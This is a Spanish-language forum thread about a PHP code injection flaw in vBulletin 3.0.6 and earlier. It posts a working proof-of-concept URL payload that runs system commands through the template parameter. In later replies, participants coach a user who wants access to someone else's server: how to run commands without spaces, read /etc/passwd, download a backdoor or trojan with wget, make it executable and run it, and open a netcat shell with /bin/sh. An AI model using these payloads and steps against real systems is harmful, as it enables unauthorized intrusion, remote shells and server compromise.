Tema destacado:  Suscripción al boletín mensual de elhacker.net
 Autor
|
Tema: vBulletin <= 3.0.6 php Code Injection (Leído 3,779 veces)
|
EL_ZoRRo
 Desconectado
Mensajes: 234
|
# Tested on vBulletin Version 3.0.1 /str0ke
# http://www.xxx.net/misc.php?do=page&template={${system(id)}}
#
# [SCAN Associates Security Advisory]
# http://www.scan-associates.net
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
# milw0rm.com [2005-02-22] Probado y funciona . Salu2
|
|
|
|
|
En línea
|
|
|
|
HaCkZaTaN
Desconectado
Mensajes: 109
|
Sip si funciona pero si el host tiene Safe Mode ON ni lo intentes lol
Salu2!!
|
|
|
|
|
En línea
|
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.004
|
mmm...esta es una bulneravilidad para los foros que corren en vBulletin?
|
|
|
|
|
En línea
|
|
|
|
Crack_X
Anti-War
Ex-Staff
Desconectado
Mensajes: 2.320
Peace & Love
|
vulnerabilidad , si lee el titulo dice vbulettin <= 3.0.6 , osea las versiones 3.0.6 y menores son vulnerables.
|
|
|
|
|
En línea
|
|
|
|
SeGoZ
Desconectado
Mensajes: 6
|
Explicación del exploit (posibilidades, ejemplos...)? ??? Thanksssss  |
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
usar exec() o execute(), system(), passthru ()... (este ultimo comando no es si esta bien xDDDD)
Las posibilidades son desde leer los ficheros de configuracion, a hacer consustas SQL (no es nada dificil), o incluso obtener acceso al sistema en si.
Salu2
|
|
|
|
|
En línea
|
|
|
|
|
_Meu086_
|
no entiendo en que consiste exactamente el bug :S alguien puede explicarlo ?
saludos
|
|
|
|
|
En línea
|
"El Ignorante Afirma, el sabio duda y Reflexiona"
Saludos..._Meu086_
|
|
|
|
Rojodos
|
El bug exactamente consiste en que puedes ejecutar CODIGO PHP en el sistema. El lenguaje php permite muchas cosas (busca que hacen los comandos de arriba), lo que puede llevar perfectamente, a poder subir un backdoor (wget www.host.com/backdoor), darle permisos de ejecucion (./chmod 777 backdoor o ./chmod +x backdoor), ejecutarlo(./backdoor <parametros>), y ya tienes una shell remota en el sistema. Todo eso con funciones PHP (si estan descativadas, obviamente no) como exec() o system(). http://es2.php.net/passthruLos bugs de inyeccion de codigo php y de remote file inclusion son muy peligrosos, no es nada dificil comprometer el server completo, teniendo acceso al mismo. Salu2 |
|
|
|
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
Hola, al poner la url infectada mas /misc.php?do=page&template={${system(cat 20/etc/passwd)}}
me sale un error, y pasa a /misc.php?do=page&template={${system(cat%20/etc/passwd)}}
creo... que no puedo separar... por ejemplo para hacer un wget url, tampoco me deja, (el server si tiene exec y system on) Alguien me podria decir como ponerlo para que se ejecutase sin dar error?
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Prueba a funciones que no tengan espacio:
system(ls) o exec(ls) o passthru(ls)
Si te sale un listado de ficheros y directorios (si es un sistema Unix!!!!), es que funciona. Obviamente, si es un Windows, pues "dir".
Puede que pese a que puedas inyectar codigo PHP, la configuracion PHP del servidor no permita esos comandos, es muy normal denegar la ejecucion de system o exec.
Salu2
|
|
|
|
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
Si, si todas las funciones system(ls) o exec(ls) o passthru(ls) estan activas, y al hacer un id, me sale permiso nobody:
uid=99(nobody) gid=99(nobody) groups=99(nobody) uid=99(nobody) gid=99(nobody) groups=99(nobody)
pero... como podria hacer un cat /etc/passwd o.. un wget url... no me deja :\ sin embargo al poner el "cat" me da la help y el "wget" tambien.. que puede ser? podria suvir... algun archivo? gracias
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
Prueba esto:
"ls+al" en vez de "ls al"
Salu2
|
|
|
|
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
me da el error: Internal Server Error creo.. que es el (500) pongo exactamente esto: www.site.com//misc.php?do=page&template={${system(ls+al)}} o.. /misc.php?do=page&template={${system(wget+url)}} pero nada..., aveces me dice esto: Parse error: parse error, unexpected '.' in /home/xxx/public_html/forums/misc.php(429) : eval()'d code on line 1 me parece extraño, tal vez solo deja inyectar codigos sin espacios? entonces no tendria mucha utilidad xD. Por favor responded, es mi oportunidad de tener acceso a un server. |
|
|
|
« Última modificación: 17 Marzo 2005, 08:51 por alb3rt0 »
|
En línea
|
|
|
|
alb3rt0
Desconectado
Mensajes: 217
|
el problema estaba en que habia que poner " entre el comando, ahora mi duda es como puedo por ftp subir un archivo? en un solo comando, e intentado con {system("ftp user:pass host file:///path")}} pero no me aclaro, a ver si alguien me hecha un cable por favor
|
|
|
|
|
En línea
|
|
|
|
|
Rojodos
|
con wget por ejemplo: "wget www.host.com/troyano"luego le das permisos de ejecucion y lo ejecutas. Puedes probar con el r0nin por ejemplo, es un buen backdoor aunque canta un webo. Si tiene el netcat (compilado con las opciones de seguridad), no tienes que subir ningun troyano: "nc -v -p 8000 -L -e /bin/sh -i" Salu2 |
|
|
|
|
En línea
|
|
|
|
|
 |
